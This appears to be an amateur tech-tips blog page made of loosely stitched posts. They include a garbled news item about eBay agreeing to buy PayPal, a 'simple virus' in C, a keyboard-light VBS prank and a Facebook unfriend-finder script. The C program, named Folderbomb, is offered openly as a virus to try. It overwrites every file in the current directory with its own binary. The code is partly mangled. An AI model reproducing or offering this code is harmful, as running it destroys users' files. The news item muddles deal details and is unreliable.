want to create a website ?

ebay agree to buy PayPal in $800 Million




                               "In I.T. field this month we get a lot of news and lot of DEAL to each other company..."

   After Micorosoft buying Nokia Phones company in 5.44 billion euros , Fairfax Financial buying BalckBerry Smart Phones company in $4.7 billion...





    and now day's ebay agree to buy PayPal Company in $800  million in cash...

ebay is also provides those service which PayPal is provided and also PayPal is shaking up with ebay and a big  DEAL with in it and finally this deal is expected to closeing end of the year...





SIMPLE VIRUS CODING

Please This Trick Try to "C" Language
/*This is a simple program to create a virus in c
It will create Folder in a Folder in a Folder and so on ......






#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_R
DONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}


Please share like &  do comment

Keyboard Trick Dancing LED ...

Hi Friends This is very funny trick

It is Work on .VBS file it is very funny trick and make your friends foollish...
it is work your CAPS LOCK , NUM LOCK , SCROLL LOCK "Light" is On-Off Continuously...


Step-1:- Open Notepad Than Paste This CODE:-

 Set wshShell =wscript.CreateObject("WScript.Shell")
             do
             wscript.sleep 100
             wshshell.sendkeys "{CAPSLOCK}"
             wshshell.sendkeys "{NUMLOCK}"
             wshshell.sendkeys "{SCROLLLOCK}"
             loop


Step-2:- Than Save It "dance.vbs"

Step-3:-Than open this file Now you can see your keyboard LIGHT it is on-off....

Now if you stop this Blinking Light's so you can follow this step:-

Step-1:- Open Your Task Manager(Ctrl+Alt+Del)

Step-2:- Than Go to Processes Tab Than Find "wscript.exe"

Step-3:- Press Right Click and Click End Process..





N joyyy.....
 

How to know Who Unfriends You & Who Delete Your Friend Request in FACEBOOK

Hi friends How are you all;
i hope all are f9 there...

Today i am gone to explain about facebook topic this topic is very interesting and i hope you all are waiting for this...

This is the Script which allow you to show who unfriend you in facebook and main thing:-
It(Script) is Run On Only This High uses Browser like a :-Mozilla Firefox, Google Chrome, Internet Explorer, Opera and Safari...

Step-1 :-You Download Unfriend Finder Script as Per Your Browser...


Step-2:- Download It ....

Step-3:- And then open your facebook and Now You can see at right side Your home Button near Unfriend Buuton you can see..





Please share like &  do comment